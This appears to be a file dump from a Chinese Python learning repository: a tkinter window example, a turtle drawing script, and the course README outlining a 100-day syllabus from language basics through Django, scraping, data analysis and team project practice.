label.config(text=msg, fg=color) # 确认退出 def confirm_to_quit(): if tkinter.messagebox.askokcancel('温馨提示', '确定要退出吗?'): top.quit() # 创建顶层窗口 top = tkinter.Tk() # 设置窗口大小 top.geometry('240x160') # 设置窗口标题 top.title('小游戏') # 创建标签对象 label = tkinter.Label(top, text='Hello, world!', font='Arial -32', fg='red') label.pack(expand=1) # 创建一个装按钮的容器 panel = tkinter.Frame(top) # 创建按钮对象 button1 = tkinter.Button(panel, text='修改', command=change_label_text) button1.pack(side='left') button2 = tkinter.Button(panel, text='退出', command=confirm_to_quit) button2.pack(side='right') panel.pack(side='bottom') # 开启主事件循环 tkinter.mainloop() if __name__ == '__main__': main() File: Day01-15/code/Day10/turtle1.py """ 用turtle模块绘图 这是一个非常有趣的模块 它模拟一只乌龟在窗口上爬行的方式来进行绘图 Version: 0.1 Author: 骆昊 Date: 2018-03-14 """ import turtle turtle.pensize(3) turtle.penup() turtle.goto(-180, 150) turtle.pencolor('red') turtle.fillcolor('yellow') turtle.pendown() turtle.begin_fill() for _ in range(36): turtle.forward(200) turtle.right(170) turtle.end_fill() turtle.mainloop()
## Python - 100天从新手到大师 > **作者**:骆昊 > > **说明**:从项目上线到获得8w+星标以来,一直收到反馈说基础部分(前15天的内容)对新手来说是比较困难的,建议有配套视频进行讲解。最近把基础部分的内容重新制作了一个名为[“Python-Core-50-Courses”](<https://github.com/jackfrued/Python-Core-50-Courses>)的项目,用更为简单通俗的方式重写了这部分内容并附带了视频讲解,初学者可以看看这个新的仓库。国内用户如果访问GitHub比较慢的话,可以关注我的**知乎号[Python-Jack](https://www.zhihu.com/people/jackfrued)**,上面的[“从零开始学Python”](<https://zhuanlan.zhihu.com/c_1216656665569013760>)专栏比较适合初学者,其他的专栏如“数据思维和统计思维”、“基于Python的数据分析”等也在持续创作和更新中,欢迎大家关注、点赞和评论。 > > 想获取学习视频的小伙伴,大家可以扫描下面的二维码进入微信小程序,看看有没有适合自己的内容。大家心心念念的机器学习的内容在小程序中都可以找到,由我和我的同事为大家录制的。 > > <img src="res/study_card.png" style="zoom:20%;"> > > 大家在学习过程中如果遇到一些棘手的问题或者需要相关的学习资源,可以加入下面的QQ交流群,三个群是一样的加入一个即可,请不要重复加群,也不要在群里发布广告和其他色情、低俗或敏感内容。**如果缺乏自律性,有付费学习的需求,可以添加我的微信(jackfrued)私聊,备注好自己的称呼和需求,我会给大家提供一些学习方案和职业规划方面的指导**。 > > <img src="res/python_study_qq_group.png" style="zoom:30%;"> > > 配套的视频在抖音和B站持续更新中,有兴趣的小伙伴可以关注我的抖音或B站账号,最近刚刚起号,还希望大家多多支持,非常感谢您! > > <img src="res/qrcode.JPG" style="zoom:20%;"> > > 大家一直催更的《机器学习和深度学习》因个人和公司的原因,一直处于停滞状态,近期会开始更新相关内容,感谢大家一如既往的支持和理解。 ### Python应用领域和职业发展分析 简单的说,Python是一个“优雅”、“明确”、“简单”的编程语言。 - 学习曲线低,非专业人士也能上手 - 开源系统,拥有强大的生态圈 - 解释型语言,完美的平台可移植性 - 动态类型语言,支持面向对象和函数式编程 - 代码规范程度高,可读性强 Python在以下领域都有用武之地。 - 后端开发 - Python / Java / Go / PHP - DevOps - Python / Shell / Ruby - 数据采集 - Python / C++ / Java - 量化交易 - Python / C++ / R - 数据科学 - Python / R / Julia / Matlab - 机器学习 - Python / R / C++ / Julia - 自动化测试 - Python / Shell 作为一名Python开发者,根据个人的喜好和职业规划,可以选择的就业领域也非常多。 - Python后端开发工程师(服务器、云平台、数据接口) - Python运维工程师(自动化运维、SRE、DevOps) - Python数据分析师(数据分析、商业智能、数字化运营) - Python数据挖掘工程师(机器学习、深度学习、算法专家) - Python爬虫工程师 - Python测试工程师(自动化测试、测试开发) > **说明**:目前,**数据分析和数据挖掘是非常热门的方向**,因为不管是互联网行业还是传统行业都已经积累了大量的数据,各行各业都需要数据分析师从已有的数据中发现更多的商业价值,从而为企业的决策提供数据的支撑,这就是所谓的数据驱动决策。 给初学者的几个建议: - Make English as your working language. (让英语成为你的工作语言) - Practice makes perfect. (熟能生巧) - All experience comes from mistakes. (所有的经验都源于你犯过的错误) - Don't be one of the leeches. (不要当伸手党) - Either outstanding or out. (要么出众,要么出局) ### Day01~15 - Python语言基础 #### Day01 - [初识Python](./Day01-15/01.初识Python.md) - Python简介 - Python的历史 / Python的优缺点 / Python的应用领域 - 搭建编程环境 - Windows环境 / Linux环境 / MacOS环境 - 从终端运行Python程序 - Hello, world / `print`函数 / 运行程序 - 使用IDLE - 交互式环境(REPL) / 编写多行代码 / 运行程序 / 退出IDLE - 注释 - 注释的作用 / 单行注释 / 多行注释 #### Day02 - [语言元素](./Day01-15/02.语言元素.md) - 程序和进制 - 指令和程序 / 冯诺依曼机 / 二进制和十进制 / 八进制和十六进制 - 变量和类型 - 变量的命名 / 变量的使用 / `input`函数 / 检查变量类型 / 类型转换 - 数字和字符串 - 整数 / 浮点数 / 复数 / 字符串 / 字符串基本操作 / 字符编码 - 运算符 - 数学运算符 / 赋值运算符 / 比较运算符 / 逻辑运算符 / 身份运算符 / 运算符的优先级 - 应用案例 - 华氏温度转换成摄氏温度 / 输入圆的半径计算周长和面积 / 输入年份判断是否是闰年 #### Day03 - [分支结构](./Day01-15/03.分支结构.md) - 分支结构的应用场景 - 条件 / 缩进 / 代码块 / 流程图 - if语句 - 简单的`if` / `if`-`else`结构 / `if`-`elif`-`else`结构 / 嵌套的`if` - 应用案例 - 用户身份验证 / 英制单位与公制单位互换 / 掷骰子决定做什么 / 百分制成绩转等级制 / 分段函数求值 / 输入三条边的长度如果能构成三角形就计算周长和面积 #### Day04 - [循环结构](./Day01-15/04.循环结构.md) - 循环结构的应用场景 - 条件 / 缩进 / 代码块 / 流程图 - while循环 - 基本结构 / `break`语句 / `continue`语句 - for循环 - 基本结构 / `range`类型 / 循环中的分支结构 / 嵌套的循环 / 提前结束程序 - 应用案例 - 1~100求和 / 判断素数 / 猜数字游戏 / 打印九九表 / 打印三角形图案 / 猴子吃桃 / 百钱百鸡 #### Day05 - [构造程序逻辑](./Day01-15/05.构造程序逻辑.md) - 经典案例:水仙花数 / 百钱百鸡 / Craps赌博游戏 - 练习题目:斐波那契数列 / 完美数 / 素数 #### Day06 - [函数和模块的使用](./Day01-15/06.函数和模块的使用.md) - 函数的作用 - 代码的坏味道 / 用函数封装功能模块 - 定义函数 - `def`关键字 / 函数名 / 参数列表 / `return`语句 / 调用自定义函数 - 调用函数 - Python内置函数 / 导入模块和函数 - 函数的参数 - 默认参数 / 可变参数 / 关键字参数 / 命名关键字参数 - 函数的返回值 - 没有返回值 / 返回单个值 / 返回多个值 - 作用域问题 - 局部作用域 / 嵌套作用域 / 全局作用域 / 内置作用域 / 和作用域相关的关键字 - 用模块管理函数 - 模块的概念 / 用自定义模块管理函数 / 命名冲突的时候会怎样(同一个模块和不同的模块) #### Day07 - [字符串和常用数据结构](./Day01-15/07.字符串和常用数据结构.md) - 字符串的使用 - 计算长度 / 下标运算 / 切片 / 常用方法 - 列表基本用法 - 定义列表 / 用下表访问元素 / 下标越界 / 添加元素 / 删除元素 / 修改元素 / 切片 / 循环遍历 - 列表常用操作 - 连接 / 复制(复制元素和复制数组) / 长度 / 排序 / 倒转 / 查找 - 生成列表 - 使用`range`创建数字列表 / 生成表达式 / 生成器 - 元组的使用 - 定义元组 / 使用元组中的值 / 修改元组变量 / 元组和列表转换 - 集合基本用法 - 集合和列表的区别 / 创建集合 / 添加元素 / 删除元素 / 清空 - 集合常用操作 - 交集 / 并集 / 差集 / 对称差 / 子集 / 超集 - 字典的基本用法 - 字典的特点 / 创建字典 / 添加元素 / 删除元素 / 取值 / 清空 - 字典常用操作 - `keys`方法 / `values`方法 / `items`方法 / `setdefault`方法 - 基础练习 - 跑马灯效果 / 列表找最大元素 / 统计考试成绩的平均分 / Fibonacci数列 / 杨辉三角 - 综合案例 - 双色球选号 / 井字棋 #### Day08 - [面向对象编程基础](./Day01-15/08.面向对象编程基础.md) - 类和对象 - 什么是类 / 什么是对象 / 面向对象其他相关概念 - 定义类 - 基本结构 / 属性和方法 / 构造器 / 析构器 / `__str__`方法 - 使用对象 - 创建对象 / 给对象发消息 - 面向对象的四大支柱 - 抽象 / 封装 / 继承 / 多态 - 基础练习 - 定义学生类 / 定义时钟类 / 定义图形类 / 定义汽车类 #### Day09 - [面向对象进阶](./Day01-15/09.面向对象进阶.md) - 属性 - 类属性 / 实例属性 / 属性访问器 / 属性修改器 / 属性删除器 / 使用`__slots__` - 类中的方法 - 实例方法 / 类方法 / 静态方法 - 运算符重载 - `__add__` / `__sub__` / `__or__` /`__getitem__` / `__setitem__` / `__len__` / `__repr__` / `__gt__` / `__lt__` / `__le__` / `__ge__` / `__eq__` / `__ne__` / `__contains__` - 类(的对象)之间的关系 - 关联 / 继承 / 依赖 - 继承和多态 - 什么是继承 / 继承的语法 / 调用父类方法 / 方法重写 / 类型判定 / 多重继承 / 菱形继承(钻石继承)和C3算法 - 综合案例 - 工资结算系统 / 图书自动折扣系统 / 自定义分数类 #### Day10 - [图形用户界面和游戏开发](./Day01-15/10.图形用户界面和游戏开发.md) - 使用`tkinter`开发GUI程序 - 使用`pygame`三方库开发游戏应用 - “大球吃小球”游戏 #### Day11 - [文件和异常](./Day01-15/11.文件和异常.md) - 读文件 - 读取整个文件 / 逐行读取 / 文件路径 - 写文件 - 覆盖写入 / 追加写入 / 文本文件 / 二进制文件 - 异常处理 - 异常机制的重要性 / `try`-`except`代码块 / `else`代码块 / `finally`代码块 / 内置异常类型 / 异常栈 / `raise`语句 - 数据持久化 - CSV文件概述 / `csv`模块的应用 / JSON数据格式 / `json`模块的应用 #### Day12 - [字符串和正则表达式](./Day01-15/12.字符串和正则表达式.md) - 字符串高级操作 - 转义字符 / 原始字符串 / 多行字符串 / `in`和`not in`运算符 / `is_xxx`方法 / `join`和`split`方法 / `strip`相关方法 / `pyperclip`模块 / 不变字符串和可变字符串 / `StringIO`的使用 - 正则表达式入门 - 正则表达式的作用 / 元字符 / 转义 / 量词 / 分组 / 零宽断言 /贪婪匹配与惰性匹配懒惰 / 使用`re`模块实现正则表达式操作(匹配、搜索、替换、捕获) - 使用正则表达式 - `re`模块 / `compile`函数 / `group`和`groups`方法 / `match`方法 / `search`方法 / `findall`和`finditer`方法 / `sub`和`subn`方法 / `split`方法 - 应用案例 - 使用正则表达式验证输入的字符串 #### Day13 - [进程和线程](./Day01-15/13.进程和线程.md) - 进程和线程的概念 - 什么是进程 / 什么是线程 / 多线程的应用场景 - 使用进程 - `fork`函数 / `multiprocessing`模块 / 进程池 / 进程间通信 - 使用线程 - `threading`模块 / `Thread`类 / `RLock`类 / `Condition`类 / 线程池 #### Day14 - [网络编程入门和网络应用开发](./Day01-15/14.网络编程入门和网络应用开发.md) - 计算机网络基础 - 计算机网络发展史 / “TCP-IP”模型 / IP地址 / 端口 / 协议 / 其他相关概念 - 网络应用模式 - “客户端-服务器”模式 / “浏览器-服务器”模式 - 基于HTTP协议访问网络资源 - 网络API概述 / 访问URL / `requests`三方库 / 解析JSON格式数据 - Python网络编程 - 套接字的概念 / `socket`模块 / `socket`函数 / 创建TCP服务器 / 创建TCP客户端 / 创建UDP服务器 / 创建UDP客户端 - 电子邮件 - SMTP协议 / POP3协议 / IMAP协议 / `smtplib`模块 / `poplib`模块 / `imaplib`模块 - 短信服务 - 调用短信服务网关 #### Day15 - [图像和文档处理](./Day01-15/15.图像和办公文档处理.md) - 用Pillow处理图片 - 图片读写 / 图片合成 / 几何变换 / 色彩转换 / 滤镜效果 - 读写Word文档 - 文本内容的处理 / 段落 / 页眉和页脚 / 样式的处理 - 读写Excel文件 - `xlrd` / `xlwt` / `openpyxl` ### Day16~Day20 - [Python语言进阶 ](./Day16-20/16-20.Python语言进阶.md) - 常用数据结构 - 函数的高级用法 - “一等公民” / 高阶函数 / Lambda函数 / 作用域和闭包 / 装饰器 - 面向对象高级知识 - “三大支柱” / 类与类之间的关系 / 垃圾回收 / 魔术属性和方法 / 混入 / 元类 / 面向对象设计原则 / GoF设计模式 - 迭代器和生成器 - 相关魔术方法 / 创建生成器的两种方式 / - 并发和异步编程 - 多线程 / 多进程 / 异步IO / `async`和`awai`t ### Day21~30 - [Web前端入门](./Day21-30/21-30.Web前端概述.md) - 用HTML标签承载页面内容 - 用CSS渲染页面 - 用JavaScript处理交互式行为 - jQuery入门和提高 - Vue.js入门 - Element的使用 - Bootstrap的使用 ### Day31~35 - [玩转Linux操作系统](./Day31-35/31-35.玩转Linux操作系统.md) - 操作系统发展史和Linux概述 - Linux基础命令 - Linux中的实用程序 - Linux的文件系统 - Vim编辑器的应用 - 环境变量和Shell编程 - 软件的安装和服务的配置 - 网络访问和管理 - 其他相关内容 ### Day36~45 - 数据库基础和进阶 #### Day36 - [关系型数据库和MySQL概述](./Day36-45/36.关系型数据库和MySQL概述.md) - 关系型数据库概述 - MySQL简介 - 安装MySQL - MySQL基本命令 #### Day37 - [SQL详解之DDL](./Day36-45/37.SQL详解之DDL.md) - 建库建表 - 删除表和修改表 #### Day38 - [SQL详解之DML](./Day36-45/38.SQL详解之DML.md) - insert操作 - delete操作 - update操作 #### Day39 - [SQL详解之DQL](./Day36-45/39.SQL详解之DQL.md) - 投影和别名 - 筛选数据 - 空值处理 - 去重 - 排序 - 聚合函数 - 嵌套查询 - 分组 - 表连接 - 笛卡尔积 - 内连接 - 自然连接 - 外连接 - 窗口函数 - 定义窗口 - 排名函数 - 取数函数 #### Day40 - [SQL详解之DCL](./Day36-45/40.SQL详解之DCL.md) - 创建用户 - 授予权限 - 召回权限 #### Day41 - [MySQL新特性](./Day36-45/41.MySQL新特性.md) - JSON类型 - 窗口函数 - 公共表表达式 #### Day42 - [视图、函数和过程](./Day36-45/42.视图、函数和过程.md) - 视图 - 使用场景 - 创建视图 - 使用限制 - 函数 - 内置函数 - 用户自定义函数(UDF) - 过程 - 创建过程 - 调用过程 #### Day43 - [索引](./Day36-45/43.索引.md) - 执行计划 - 索引的原理 - 创建索引 - 普通索引 - 唯一索引 - 前缀索引 - 复合索引 - 注意事项 #### Day44 - [Python接入MySQL数据库](./Day36-45/44.Python接入MySQL数据库.md) - 安装三方库 - 创建连接 - 获取游标 - 执行SQL语句 - 通过游标抓取数据 - 事务提交和回滚 - 释放连接 - 编写ETL脚本 #### Day45 - [大数据平台和HiveSQL](./Day36-45/45.大数据平台和HiveSQL.md) - Hadoop生态圈 - Hive概述 - 准备工作 - 数据类型 - DDL操作 - DML操作 - 数据查询 ### Day46~60 - 实战Django #### Day46 - [Django快速上手](./Day46-60/46.Django快速上手.md) - Web应用工作机制 - HTTP请求和响应 - Django框架概述 - 5分钟快速上手 #### Day47 - [深入模型](./Day46-60/47.深入模型.md) - 关系型数据库配置 - 使用ORM完成对模型的CRUD操作 - 管理后台的使用 - Django模型最佳实践 - 模型定义参考 #### Day48 - [静态资源和Ajax请求](./Day46-60/48.静态资源和Ajax请求.md) - 加载静态资源 - Ajax概述 - 用Ajax实现投票功能 #### Day49 - [Cookie和Session](./Day46-60/49.Cookie和Session.md) - 实现用户跟踪 - cookie和session的关系 - Django框架对session的支持 - 视图函数中的cookie读写操作 #### Day50 - [报表和日志](./Day46-60/50.制作报表.md) - 通过`HttpResponse`修改响应头 - 使用`StreamingHttpResponse`处理大文件 - 使用`xlwt`生成Excel报表 - 使用`reportlab`生成PDF报表 - 使用ECharts生成前端图表 #### Day51 - [日志和调试工具栏](./Day46-60/51.日志和调试工具栏.md) - 配置日志 - 配置Django-Debug-Toolbar - 优化ORM代码 #### Day52 - [中间件的应用](./Day46-60/52.中间件的应用.md) - 什么是中间件 - Django框架内置的中间件 - 自定义中间件及其应用场景 #### Day53 - [前后端分离开发入门](./Day46-60/53.前后端分离开发入门.md) - 返回JSON格式的数据 - 用Vue.js渲染页面 #### Day54 - [RESTful架构和DRF入门](./Day46-60/54.RESTful架构和DRF入门.md) - REST概述 - DRF库使用入门 - 前后端分离开发 - JWT的应用 #### Day55 - [RESTful架构和DRF进阶](./Day46-60/55.RESTful架构和DRF进阶.md) - 使用CBV - 数据分页 - 数据筛选 #### Day56 - [使用缓存](./Day46-60/56.使用缓存.md) - 网站优化第一定律 - 在Django项目中使用Redis提供缓存服务 - 在视图函数中读写缓存 - 使用装饰器实现页面缓存 - 为数据接口提供缓存服务 #### Day57 - [接入三方平台](./Day46-60/57.接入三方平台.md) - 文件上传表单控件和图片文件预览 - 服务器端如何处理上传的文件 #### Day58 - [异步任务和定时任务](./Day46-60/58.异步任务和定时任务.md) - 网站优化第二定律 - 配置消息队列服务 - 在项目中使用Celery实现任务异步化 - 在项目中使用Celery实现定时任务 #### Day59 - [单元测试](./Day46-60/59.单元测试.md) #### Day60 - [项目上线](./Day46-60/60.项目上线.md) - Python中的单元测试 - Django框架对单元测试的支持 - 使用版本控制系统 - 配置和使用uWSGI - 动静分离和Nginx配置 - 配置HTTPS - 配置域名解析 ### Day61~65 - [爬虫开发](./Day61-65) #### Day61 - [网络数据采集概述](./Day61-65/61.网络数据采集概述.md) - 网络爬虫的概念及其应用领域 - 网络爬虫的合法性探讨 - 开发网络爬虫的相关工具 - 一个爬虫程序的构成 #### Day62 - 数据抓取和解析 - [使用`requests`三方库实现数据抓取](./Day61-65/62.用Python获取网络资源-1.md) - [页面解析的三种方式](./Day61-65/62.用Python解析HTML页面-2.md) - 正则表达式解析 - XPath解析 - CSS选择器解析 #### Day63 - Python中的并发编程 - [多线程](./Day61-65/63.Python中的并发编程-1.md) - [多进程](./Day61-65/63.Python中的并发编程-2.md) - [异步I/O](./Day61-65/63.Python中的并发编程-3.md) #### Day64 - [使用Selenium抓取网页动态内容](./Day61-65/64.使用Selenium抓取网页动态内容.md) - 安装Selenium - 加载页面 - 查找元素和模拟用户行为 - 隐式等待和显示等待 - 执行JavaScript代码 - Selenium反爬破解 - 设置无头浏览器 #### Day65 - [爬虫框架Scrapy简介](./Day61-65/65.爬虫框架Scrapy简介.md) - Scrapy核心组件 - Scrapy工作流程 - 安装Scrapy和创建项目 - 编写蜘蛛程序 - 编写中间件和管道程序 - Scrapy配置文件 ### Day66~80 - 数据分析 #### Day66 - [数据分析概述](./Day66-80/66.数据分析概述.md) - 数据分析师的职责 - 数据分析师的技能栈 - 数据分析相关库 #### Day67 - [环境准备](./Day66-80/67.环境准备.md) - 安装和使用anaconda - conda相关命令 - 安装和使用jupyter-lab - 安装和启动 - 使用小技巧 #### Day68 - [NumPy的应用-1](./Day66-80/68.NumPy的应用-1.md) - 创建数组对象 - 数组对象的属性 - 数组对象的索引运算 - 普通索引 - 花式索引 - 布尔索引 - 切片索引 - 案例:使用数组处理图像 #### Day69 - [NumPy的应用-2](./Day66-80/69.NumPy的应用-2.md) - 数组对象的相关方法 - 获取描述性统计信息 - 其他相关方法 #### Day70 - [NumPy的应用-3](./Day66-80/70.NumPy的应用-3.md) - 数组的运算 - 数组跟标量的运算 - 数组跟数组的运算 - 通用一元函数 - 通用二元函数 - 广播机制 - Numpy常用函数 #### Day71 - [NumPy的应用-4](./Day66-80/71.NumPy的应用-4.md) - 向量 - 行列式 - 矩阵 - 多项式 #### Day72 - [深入浅出pandas-1](./Day66-80/72.深入浅出pandas-1.md) - 创建`Series`对象 - `Series`对象的运算 - `Series`对象的属性和方法 #### Day73 - [深入浅出pandas-2](./Day66-80/73.深入浅出pandas-2.md) - 创建`DataFrame`对象 - `DataFrame`对象的属性和方法 - 读写`DataFrame`中的数据 #### Day74 - [深入浅出pandas-3](./Day66-80/74.深入浅出pandas-3.md) - 数据重塑 - 数据拼接 - 数据合并 - 数据清洗 - 缺失值 - 重复值 - 异常值 - 预处理 #### Day75 - [深入浅出pandas-4](./Day66-80/75.深入浅出pandas-4.md) - 数据透视 - 获取描述性统计信息 - 排序和头部值 - 分组聚合 - 透视表和交叉表 - 数据呈现 #### Day76 - [深入浅出pandas-5](./Day66-80/76.深入浅出pandas-5.md) - 计算同比环比 - 窗口计算 - 相关性判定 #### Day77 - [深入浅出pandas-6](./Day66-80/77.深入浅出pandas-6.md) - 索引的使用 - 范围索引 - 分类索引 - 多级索引 - 间隔索引 - 日期时间索引 #### Day78 - [数据可视化-1](./Day66-80/78.数据可视化-1.md) - 安装和导入matplotlib - 创建画布 - 创建坐标系 - 绘制图表 - 折线图 - 散点图 - 柱状图 - 饼状图 - 直方图 - 箱线图 - 显示和保存图表 #### Day79 - [数据可视化-2](./Day66-80/79.数据可视化-2.md) - 高阶图表 - 气泡图 - 面积图 - 雷达图 - 玫瑰图 - 3D图表 #### Day80 - [数据可视化-3](./Day66-80/80.数据可视化-3.md) - Seaborn - Pyecharts ### Day81~90 - [机器学习和深度学习](./Day81-90) #### Day81 - [机器学习基础](./Day81-90/81.机器学习基础.md) #### Day82 - [k最近邻分类](./Day81-90/82.k最近邻分类.md) #### Day83 - [决策树](./Day81-90/83.决策树.md) #### Day84 - [贝叶斯分类](./Day81-90/84.贝叶斯分类.md) #### Day85 - [支持向量机](./Day81-90/85.支持向量机.md) #### Day86 - [K-均值聚类](./Day81-90/86.K-均值聚类.md) #### Day87 - [回归分析](./Day81-90/87.回归分析.md) #### Day88 - [深度学习入门](./Day81-90/88.深度学习入门.md) #### Day89 - [PyTorch概述](./Day81-90/89.PyTorch概述.md) #### Day90 - [PyTorch实战](./Day81-90/90.PyTorch实战.md) ### Day91~100 - [团队项目开发](./Day91-100) #### 第91天:[团队项目开发的问题和解决方案](./Day91-100/91.团队项目开发的问题和解决方案.md) 1. 软件过程模型 - 经典过程模型(瀑布模型) - 可行性分析(研究做还是不做),输出《可行性分析报告》。 - 需求分析(研究做什么),输出《需求规格说明书》和产品界面原型图。 - 概要设计和详细设计,输出概念模型图(ER图)、物理模型图、类图、时序图等。 - 编码 / 测试。 - 上线 / 维护。 瀑布模型最大的缺点是无法拥抱需求变化,整套流程结束后才能看到产品,团队士气低落。 - 敏捷开发(Scrum)- 产品所有者、Scrum Master、研发人员 - Sprint - 产品的Backlog(用户故事、产品原型)。 - 计划会议(评估和预算)。 - 日常开发(站立会议、番茄工作法、结对编程、测试先行、代码重构……)。 - 修复bug(问题描述、重现步骤、测试人员、被指派人)。 - 发布版本。 - 评审会议(Showcase,用户需要参与)。 - 回顾会议(对当前迭代周期做一个总结)。 > 补充:敏捷软件开发宣言 > > - **个体和互动** 高于 流程和工具 > - **工作的软件** 高于 详尽的文档 > - **客户合作** 高于 合同谈判 > - **响应变化** 高于 遵循计划 ![](./res/agile-scrum-sprint-cycle.png) > 角色:产品所有者(决定做什么,能对需求拍板的人)、团队负责人(解决各种问题,专注如何更好的工作,屏蔽外部对开发团队的影响)、开发团队(项目执行人员,具体指开发人员和测试人员)。 > 准备工作:商业案例和资金、合同、憧憬、初始产品需求、初始发布计划、入股、组建团队。 > 敏捷团队通常人数为8-10人。 > 工作量估算:将开发任务量化,包括原型、Logo设计、UI设计、前端开发等,尽量把每个工作分解到最小任务量,最小任务量标准为工作时间不能超过两天,然后估算总体项目时间。把每个任务都贴在看板上面,看板上分三部分:to do(待完成)、in progress(进行中)和done(已完成)。 2. 项目团队组建 - 团队的构成和角色 > 说明:感谢**付祥英**女士帮助我绘制了下面这张精美的公司组织架构图。 ![company_architecture](./res/company_architecture.png) - 编程规范和代码审查(`flake8`、`pylint`) ![](./res/pylint.png) - Python中的一些“惯例”(请参考[《Python惯例-如何编写Pythonic的代码》](Python惯例.md)) - 影响代码可读性的原因: - 代码注释太少或者没有注释 - 代码破坏了语言的最佳实践 - 反模式编程(意大利面代码、复制-黏贴编程、自负编程、……) 3. 团队开发工具介绍 - 版本控制:Git、Mercury - 缺陷管理:[Gitlab](https://about.gitlab.com/)、[Redmine](http://www.redmine.org.cn/) - 敏捷闭环工具:[禅道](https://www.zentao.net/)、[JIRA](https://www.atlassian.com/software/jira/features) - 持续集成:[Jenkins](https://jenkins.io/)、[Travis-CI](https://travis-ci.org/) 请参考[《团队项目开发的问题和解决方案》](Day91-100/91.团队项目开发的问题和解决方案.md)。 ##### 项目选题和理解业务 1. 选题范围设定 - CMS(用户端):新闻聚合网站、问答/分享社区、影评/书评网站等。 - MIS(用户端+管理端):KMS、KPI考核系统、HRS、CRM系统、供应链系统、仓储管理系统等。 - App后台(管理端+数据接口):二手交易类、报刊杂志类、小众电商类、新闻资讯类、旅游类、社交类、阅读类等。 - 其他类型:自身行业背景和工作经验、业务容易理解和把控。 2. 需求理解、模块划分和任务分配 - 需求理解:头脑风暴和竞品分析。 - 模块划分:画思维导图(XMind),每个模块是一个枝节点,每个具体的功能是一个叶节点(用动词表述),需要确保每个叶节点无法再生出新节点,确定每个叶子节点的重要性、优先级和工作量。 - 任务分配:由项目负责人根据上面的指标为每个团队成员分配任务。 ![](./res/requirements_by_xmind.png) 3. 制定项目进度表(每日更新) | 模块 | 功能 | 人员 | 状态 | 完成 | 工时 | 计划开始 | 实际开始 | 计划结束 | 实际结束 | 备注 | | ---- | -------- | ------ | -------- | ---- | ---- | -------- | -------- | -------- | -------- | ---------------- | | 评论 | 添加评论 | 王大锤 | 正在进行 | 50% | 4 | 2018/8/7 | | 2018/8/7 | | | | | 删除评论 | 王大锤 | 等待 | 0% | 2 | 2018/8/7 | | 2018/8/7 | | | | | 查看评论 | 白元芳 | 正在进行 | 20% | 4 | 2018/8/7 | | 2018/8/7 | | 需要进行代码审查 | | | 评论投票 | 白元芳 | 等待 | 0% | 4 | 2018/8/8 | | 2018/8/8 | | | 4. OOAD和数据库设计 - UML(统一建模语言)的类图 ![uml](./res/uml-class-diagram.png) - 通过模型创建表(正向工程),例如在Django项目中可以通过下面的命令创建二维表。 ```Shell python manage.py makemigrations app python manage.py migrate ``` - 使用PowerDesigner绘制物理模型图。 ![](./res/power-designer-pdm.png) - 通过数据表创建模型(反向工程),例如在Django项目中可以通过下面的命令生成模型。 ```Shell python manage.py inspectdb > app/models.py ``` #### 第92天:[Docker容器技术详解](./Day91-100/92.Docker容器技术详解.md) 1. Docker简介 2. 安装Docker 3. 使用Docker创建容器(Nginx、MySQL、Redis、Gitlab、Jenkins) 4. 构建Docker镜像(Dockerfile的编写和相关指令) 5. 容器编排(Docker-compose) 6. 集群管理(Kubernetes) #### 第93天:[MySQL性能优化](./Day91-100/93.MySQL性能优化.md) 1. 基本原则 2. InnoDB引擎 3. 索引的使用和注意事项 4. 数据分区 5. SQL优化 6. 配置优化 7. 架构优化 #### 第94天:[网络API接口设计](./Day91-100/94.网络API接口设计.md) - 设计原则 - 关键问题 - 其他问题 - 文档撰写 #### 第95天:[使用Django开发商业项目](./Day91-100/95.使用Django开发商业项 目.md) ##### 项目开发中的公共问题 1. 数据库的配置(多数据库、主从复制、数据库路由) 2. 缓存的配置(分区缓存、键设置、超时设置、主从复制、故障恢复(哨兵)) 3. 日志的配置 4. 分析和调试(Django-Debug-ToolBar) 5. 好用的Python模块(日期计算、图像处理、数据加密、三方API) ##### REST API设计 1. RESTful架构 - [理解RESTful架构](http://www.ruanyifeng.com/blog/2011/09/restful.html) - [RESTful API设计指南](http://www.ruanyifeng.com/blog/2014/05/restful_api.html) - [RESTful API最佳实践](http://www.ruanyifeng.com/blog/2018/10/restful-api-best-practices.html) 2. API接口文档的撰写 - [RAP2](http://rap2.taobao.org/) - [YAPI](http://yapi.demo.qunar.com/) 3. [django-REST-framework](https://www.django-rest-framework.org/)的应用 ##### 项目中的重点难点剖析 1. 使用缓存缓解数据库压力 - Redis 2. 使用消息队列做解耦合和削峰 - Celery + RabbitMQ #### 第96天:[软件测试和自动化测试](Day91-100/96.软件测试和自动化测试.md) ##### 单元测试 1. 测试的种类 2. 编写单元测试(`unittest`、`pytest`、`nose2`、`tox`、`ddt`、……) 3. 测试覆盖率(`coverage`) ##### Django项目部署 1. 部署前的准备工作 - 关键设置(SECRET_KEY / DEBUG / ALLOWED_HOSTS / 缓存 / 数据库) - HTTPS / CSRF_COOKIE_SECUR / SESSION_COOKIE_SECURE - 日志相关配置 2. Linux常用命令回顾 3. Linux常用服务的安装和配置 4. uWSGI/Gunicorn和Nginx的使用 - Gunicorn和uWSGI的比较 - 对于不需要大量定制化的简单应用程序,Gunicorn是一个不错的选择,uWSGI的学习曲线比Gunicorn要陡峭得多,Gunicorn的默认参数就已经能够适应大多数应用程序。 - uWSGI支持异构部署。 - 由于Nginx本身支持uWSGI,在线上一般都将Nginx和uWSGI捆绑在一起部署,而且uWSGI属于功能齐全且高度定制的WSGI中间件。 - 在性能上,Gunicorn和uWSGI其实表现相当。 5. 使用虚拟化技术(Docker)部署测试环境和生产环境 ##### 性能测试 1. AB的使用 2. SQLslap的使用 3. sysbench的使用 ##### 自动化测试 1. 使用Shell和Python进行自动化测试 2. 使用Selenium实现自动化测试 - Selenium IDE - Selenium WebDriver - Selenium Remote Control 3. 测试工具Robot Framework介绍 #### 第97天:[电商网站技术要点剖析](./Day91-100/97.电商网站技术要点剖析.md) 1. 商业模式和需求要点 2. 物理模型设计 3. 第三方登录 4. 缓存预热和查询缓存 5. 购物车的实现 6. 支付功能集成 7. 秒杀和超卖问题 8. 静态资源管理 9. 全文检索方案 #### 第98天:[项目部署上线和性能调优](./Day91-100/98.项目部署上线和性能调优.md) 1. MySQL数据库调优 2. Web服务器性能优化 - Nginx负载均衡配置 - Keepalived实现高可用 3. 代码性能调优 - 多线程 - 异步化 4. 静态资源访问优化 - 云存储 - CDN #### 第99天:[面试中的公共问题](./Day91-100/99.面试中的公共问题.md) - 计算机基础 - Python基础 - Web框架相关 - 爬虫相关问题 - 数据分析 - 项目相关 #### 第100天:[Python面试题实录](./Day91-100/100.Python面试题实录.md)
ddia
a735a7937df7533122defd88884ce34f67ef0505
